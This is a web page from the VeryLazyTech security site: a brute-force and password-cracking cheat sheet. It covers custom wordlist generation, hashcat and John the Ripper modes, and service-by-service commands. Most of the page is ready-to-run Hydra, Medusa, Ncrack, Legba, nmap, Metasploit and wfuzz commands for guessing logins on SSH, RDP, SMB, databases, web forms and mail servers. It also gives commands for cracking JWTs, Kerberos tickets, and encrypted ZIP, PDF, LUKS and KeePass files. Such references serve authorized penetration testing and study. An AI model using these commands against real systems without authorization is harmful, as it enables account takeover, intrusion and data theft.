Brute Force - Services, web, local, tools & wordlists

A comprehensive brute force guide covering web logins, APIs, and local services like IMAP, MySQL, and LDAP using tools like Hydra, Medusa, Legba, and more.

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Default Credentials

Search in google for default credentials of the technology that is being used, or try these links:

One of the easiest and most overlooked attack vectors is the use of default usernames and passwords. Many systems, especially routers, cameras, IoT devices, web panels, and enterprise software, ship with default login credentials. These are often never changed — making them low-hanging fruit for attackers and red teamers alike.

Before launching a brute-force attack, always check whether the system uses default creds. You can often find these in documentation, online forums, or public lists.

📚 Top Resources for Default Credentials:

Create Your Own Dictionaries

While default credential lists are a great starting point, custom wordlists tailored to your target dramatically increase the success rate of brute-force and dictionary attacks. By gathering intel about the target, you can generate personalized passwords that are far more likely to work.

Here are some effective methods and tools for building your own dictionaries:

Crunch – Custom Pattern Generator

crunch allows you to generate wordlists with fine control over length, character sets, and patterns.

# Length 4 to 6, using numbers and uppercase hex
crunch 4 6 0123456789ABCDEF -o crunch1.txt

# Length 4 only, using predefined charset
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

# Pattern-based example
crunch 6 8 -t ,@@^^%%
@ = lowercase | , = uppercase | % = numbers | ^ = special characters

Website-Based Wordlists

Leverage content from target websites to generate relevant wordlists:

# Use CeWL to scrape words from a target site
cewl https://example.com -m 5 -w words.txt

# Tok grabs words from a list of URLs
cat urls.txt | tok

# Extract words from JS files (via getjswords)
cat js-urls.txt | python3 getjswords.py

CUPP (Common User Passwords Profiler)

Generate passwords based on personal info like name, birthdate, pets, etc.

python3 cupp.py -h

Wister – Wordlist Mutator

Create highly customized lists by combining keywords and patterns.

python3 wister.py -w john james 1025 summer london 1999 -c 1 2 3 4 5 -o wordlist.lst

 __          _______  _____ _______ ______ _____
 \ \        / /_   _|/ ____|__   __|  ____|  __ \
  \ \  /\  / /  | | | (___    | |  | |__  | |__) |
   \ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
    \  /\  /   _| |_ ____) |  | |  | |____| | \ \
     \/  \/   |_____|_____/   |_|  |______|_|  \_\

      Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 54672 lines.

Finished in 0.670s.

Pydictor – Advanced Dictionary Generator

Powerful Python-based wordlist generator with smart rulesets. GitHub: bluetiger9/pydictor

📚 Popular Wordlists & Repositories:

Tools

Hash examples: https://openwall.info/wiki/john/sample-hashes

Hash-identifier

hash-identifier
> <HASH>

Hashcat

Hashcat attacks

Wordlist attack (-a 0) with rules

Hashcat already comes with a folder containing rules but you can find other interesting rules here.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule

Wordlist combinator attack

It's possible to combine 2 wordlists into 1 with hashcat. If list 1 contained the word "hello" and the second contained 2 lines with the words "world" and "earth". The words helloworld and helloearth will be generated.

# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!

Mask attack (-a 3)

# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask

Wordlist + Mask (-a 6) / Mask + Wordlist (-a 7) attack

# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Hashcat modes

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Cracking Linux Hashes - /etc/shadow file

 500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Cracking Windows Hashes

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Cracking Common Application Hashes

  900 | MD4                                              | Raw Hash
    0 | MD5                                              | Raw Hash
 5100 | Half MD5                                         | Raw Hash
  100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
 1400 | SHA-256                                          | Raw Hash
 1700 | SHA-512                                          | Raw Hash

Common Services

Once you've got a solid wordlist, it's time to test it against live services. Below are examples for brute-forcing commonly exposed protocols using Hydra, Nmap, Metasploit, Legba, and more.

AFP (Apple Filing Protocol)

nmap -p 548 --script afp-brute <IP>

Using Metasploit:

msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_TO_PASSWORDS>
msf> set USER_FILE <PATH_TO_USERS>
msf> run

AJP (Apache JServ Protocol)

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, etc.)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt
# Add --amql-ssl if needed for SSL connections

Cassandra / ScyllaDB

nmap --script cassandra-brute -p 9160 <IP>

# Using Legba
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

Cisco

CouchDB

Metasploit:

msf> use auxiliary/scanner/couchdb/couchdb_login

Or using Hydra:

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Docker Registry

hydra -L /usr/share/brutex/wordlists/simple-users.txt \
      -P /usr/share/brutex/wordlists/password.lst \
      10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

hydra -L /usr/share/brutex/wordlists/simple-users.txt \
      -P /usr/share/brutex/wordlists/password.lst \
      localhost -s 9200 http-get /

FTP (File Transfer Protocol)

Hydra Example:

hydra -l root -P passwords.txt <IP> ftp

Ncrack Example:

ncrack -p 21 --user root -P passwords.txt <IP>

Medusa Example:

medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

Legba Example:

legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

HTTP Burte Force

POST, Single list, filter string (hide)

wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
#Here we have filtered by line

POST, 2 lists, filter code (show)

wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
#Here we have filtered by code

GET, 2 lists, filter string (show), proxy, cookies

wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"

Bruteforce Directory/RESTful bruteforce

Arjun parameters wordlist

wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ

Path Parameters BF

wfuzz -c -w ~/git/Arjun/db/params.txt --hw 11 'http://example.com/path%3BFUZZ=FUZZ'

Header Authentication

Basic, 2 lists, filter string (show), proxy

wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --basic FUZZ:FUZ2Z "http://example.com/index.php"

NTLM, 2 lists, filter string (show), proxy

wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php"

Cookie/Header bruteforce (vhost brute)

Cookie, filter code (show), proxy

wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ"  "http://example.com/index.php"

User-Agent, filter code (hide), proxy

wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ"  "http://example.com/index.php"

Host

wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-
top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u
http://example.com -t 100

HTTP Verbs (methods) bruteforce

Using file

wfuzz -c -w methods.txt -p 127.0.0.1:8080:HTTP --sc 200 -X FUZZ "http://example.com/index.php"

Using inline list

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://testphp.vulnweb.com/

Directory & Files Bruteforce

#Filter by whitelisting codes
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,202,204,301,302,307,403 http://example.com/uploads/FUZZ

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

For https you have to change from "http-post-form" to "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT (JSON Web Token)

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

# Hashcat
hashcat -m 16500 -a 0 jwt.txt wordlists/rockyou.txt

# CrackJWT
python crackjwt.py <JWT> /usr/share/wordlists/rockyou.txt

# John the Ripper
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

# JWT Tool
python3 jwt_tool.py -d wordlists.txt <JWT>

# C-JWT-Cracker
./jwtcrack <JWT> 1234567890 8

# JWT-Pwn
python3 jwt-cracker.py -jwt <JWT> -w wordlist.txt

# JWT-Cracker (Node.js)
jwt-cracker "<JWT>" "abcdefghijklmnopqrstuwxyz" 6

Keberoasting

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

LDAP

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

Lucks image

https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Another Luks BF tutorial: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

MQTT

ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

MongoDB

nmap -sV --script mongodb-brute -n -p 27017 <IP>

# Metasploit
msf> use auxiliary/scanner/mongodb/mongodb_login

# Legba
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

# MSSQLPwner - Bruteforce using tickets, hashes, and/or passwords
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Legba
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

# Hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# Metasploit
msf> use auxiliary/scanner/mysql/mysql_login
msf> set VERBOSE false

# Medusa
medusa -h <IP/Host> -u <username> -P <password_list> -f -t <threads> -M mysql

# Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

NTLM cracking

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Open Office Pwd Protected Column

If you have an xlsx file with a column protected by a password you can unprotect it:

Upload it to google drive and the password will be automatically removed
To remove it manually:

unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

OracleSQL

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

In order to use oracle_login with patator you need to install:

pip3 install cx_Oracle --upgrade

Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):

 nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

PDF

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

PDF Owner Password

To crack a PDF Owner password check this: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

PGP/GPG Private key

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

POP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username [email protected] --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username [email protected] --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PFX Certificates

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>

RDP

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

hydra -L <Username_list> rsh://<Victim_IP> -v -V

rsh-grindpentestmonkey

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SFTP

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username [email protected] --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Weak SSH keys / Debian predictable PRNG

Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as snowdroppe/ssh-keybrute. Pre-generated sets of weak keys are also available such as g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ)

The STOMP text protocol is a widely used messaging protocol that allows seamless communication and interaction with popular message queueing services such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
    --username admin \
    --password wordlists/passwords.txt \
    --target localhost:23 \
    --telnet-user-prompt "login: " \
    --telnet-pass-prompt "Password: " \
    --telnet-prompt ":~$ " \
    --single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.john
john zip.john

#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Known plaintext zip attack

You need to know the plaintext (or part of the plaintext) of a file contained inside the encrypted zip. You can check filenames and size of files contained inside an encrypted zip running: 7z l encrypted.zip Download bkcrack from the releases page.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

Online cracking databases

https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value)
https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
https://crackstation.net/ (Hashes)
https://md5decrypt.net/ (MD5)
https://gpuhash.me/ (Hashes and file hashes)
https://hashes.org/search.php (Hashes)
https://www.cmd5.org/ (Hashes)
https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
https://www.md5online.org/md5-decrypt.html (MD5)
http://reverse-hash-lookup.online-domain-tools.com/

Check this out before trying to brute force a Hash.

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousContent Security Policy (CSP) bypass NextShellshock

Last updated 6 months ago

Was this helpful?